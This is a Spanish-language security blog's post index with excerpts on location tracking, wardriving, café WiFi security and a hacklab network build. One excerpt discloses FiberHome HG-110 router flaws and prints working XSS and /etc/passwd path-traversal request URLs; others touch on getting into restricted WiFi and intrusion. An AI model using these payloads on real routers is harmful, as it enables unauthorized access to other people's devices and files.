Hace poco salió la noticia de que Apple, Microsoft y Google están rastreando a los usuarios de sus productos, guardando de forma pasiva los datos de geolocalización, y posteriormente subiendolos o sincronizandolos con algún servidor. Tambien me gustaría recordar la noticia que apareció hace un tiempo cuando se descubrió que los autos de Google que [...]
Android Map: Conoce la ubicación de tu Access Point
Abril 28th, 2011 · 2 Comentarios
Etiquetas: Interes general · Privacidad · wireless
Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar
Abril 8th, 2011 · 19 Comentarios
En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas: Las vulnerabilidades que he encontrado son: Cross-Site Scripting: http://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns Local File Include and Directory/Path Traversal: http://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns Para poder explotar estas vulnerabilidades no es necesario estar autenticado. Informacion del dispositivo: HardwareVersion : HG110_BH_R1A SoftwareVersion : HG110_BH_V1.6 Firmware Version [...]
Etiquetas: Hacking · Seguridad
Nueva infraestructura de red, torre triangular y antenas Yagi para el hacklab
Abril 20th, 2010 · 4 Comentarios
En el hacklab estamos remodelando la infraestructura de red, en simples palabras lo que buscamos es mejorar la disponibilidad de internet y de los recursos que queremos ofrecer. Para esto hemos pensado junto a xwall en armar una estructura donde poder poner un pc y un par de antenas. El esquema de lo que tenemos [...]
Etiquetas: Proyectos · wireless
Por la razón o la fuerza: WiFi en restaurantes, pubs, etc
Marzo 21st, 2010 · 3 Comentarios
Cada vez es más común que en un pub o restaurant haya WiFi para los clientes, pero tambien es muy común que sea sólo para usos “administrativos” y no para los clientes. Yo, en lo personal, busco lugares que tengan WiFi para poder estar conectado mientras almuerzo o me tomo una cerveza y muchas veces [...]
Etiquetas: Anecdotas · Hacking · Seguridad
Estúpida campaña “Libera tu WiFi”
Marzo 6th, 2010 · 13 Comentarios
Mientras unos velan por la seguridad de las redes inalambricas y se parten la cabeza buscando algorítmos que sean lo suficientemente seguros, a otros se les ocurre la ridícula fantástica idea de dejar las redes inalámbricas sin clave. Para mi, es exáctamente igual a pedir a la gente que deje sus negocios y casas sin [...]
Etiquetas: Seguridad
Inseguridad de redes inalámbricas en cafeterias, pubs, hoteles, etc
Noviembre 21st, 2009 · 6 Comentarios
Me gustaría escribir un poco sobre el tema de la seguridad en las redes inalámbricas que uno se encuentra cuando va a alguna cafetería, hotel, pub, restorante, etc. Es muy común que sólo las personas que consuman algún producto en el local tengan acceso a wifi, para esto la súper medida de protección que se [...]
Etiquetas: Interes general · Seguridad
kismet + gpsd + gpsdrive = wardriving!
Noviembre 21st, 2009 · 3 Comentarios
Antes que todo, quisiera agradecer a Leo_, quien donó prestó el GPS para que los del hacklab pudieramos jugar. Y para los que no saben lo que es el Wardriving: Se llama wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado [...]
Etiquetas: Documentacion · Hacking
Atacando desde el corazón
Noviembre 8th, 2009 · 7 Comentarios
Hay dos técnicas para atacar un objetivo desde “el corazón”, una es ingresando remotamente a alguno de los servidores mediante algún servicio o alguna vulnerabilidad en el sitio web y la segunda, es ingresando directamente a la red de área local o LAN. Existen muchas vulnerabilidades conocidas y comunes que nos permiten ingresar a lugares [...]
